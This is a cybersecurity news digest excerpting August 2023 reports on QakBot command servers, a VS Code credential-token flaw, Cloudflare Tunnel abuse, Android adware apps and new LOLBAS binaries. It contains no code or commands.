- Details
- The Hacker News
August 08, 2023 The Hacker News published The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023.
The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day.
"QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said.
"But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?" Read More
- Details
- BleepingComputer
August 08, 2023 BleepingComputer published Microsoft's Visual Studio Code (VS Code) code editor and development environment contains a flaw that allows malicious extensions to retrieve authentication tokens stored in Windows, Linux, and macOS credential managers.
These tokens are used for integrating with various third-party services and APIs, such as Git, GitHub, and other coding platforms, so stealing them could have significant consequences for a compromised organization's data security, potentially leading to unauthorized system access, data breaches, etc.
The flaw was discovered by Cycode researchers, who reported it to Microsoft along with a working proof-of-concept (PoC) they developed. Yet, the tech giant decided against fixing the issue, as extensions are not expected to be sandboxed from the rest of the environment. Read More...
- Details
- BleepingComputer
August 07, 2023 BleepingComputer published Hackers are increasingly abusing the legitimate Cloudflare Tunnels feature to create stealthy HTTPS connections from compromised devices, bypass firewalls, and maintain long-term persistence.
The technique isn't entirely new, as Phylum reported in January 2023 that threat actors created malicious PyPI packages that used Cloudflare Tunnels to stealthy steal data or remotely access devices.
However, it appears that more threat actors have started to use this tactic, as GuidePoint's DFIR and GRIT teams reported last week, seeing an uptick in activity. Read More..
- Details
- BleepingComputer
August 07, 2023 BleepingComputer published The Google Play store was infiltrated by 43 Android applications with 2.5 million installs that secretly displayed advertisements while a phone's screen was off, running down a device's battery.
McAfee's Mobile Research Team discovered the malicious Android apps and reported them to Google as they violated Google Play Store's policies. Google subsequently removed the apps from Android's official store.
The applications were mainly media streaming apps and news aggregators, and the target audience was predominately Korean. However, the same deceptive tactics could very easily be applied to other app categories and more diverse user demographics. Read More..
- Details
- BleepingComputer
August 03, 2023 BleepingComputer published The list of LOLBAS files - legitimate binaries and scripts present in Windows that can be abused for malicious purposes, will soon include the main executables for Microsoft’s Outlook email client and Access database management system.
The main executable for the Microsoft Publisher application has already been confirmed that it can download payloads from a remote server.
LOLBAS stands for Living-off-the-Land Binaries and Scripts and are typically described as signed files that are either native to the Windows operating system or downloaded from Microsoft.
They are legitimate tools that hackers can abuse during post-exploitation activity to download and/or run payloads without triggering defensive mechanisms. Read More..
- Microsoft Shares fix for Outlook Asking to Reopen Closed Windows
- Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners
- Chrome Malware Rilide Targets Enterprise Users via PowerPoint Guides
- Malicious Windows Kernel Drivers used in Blackcat Ransomware Attacks
- Microsoft Investigates Slow Windows VPN Speeds After May Updates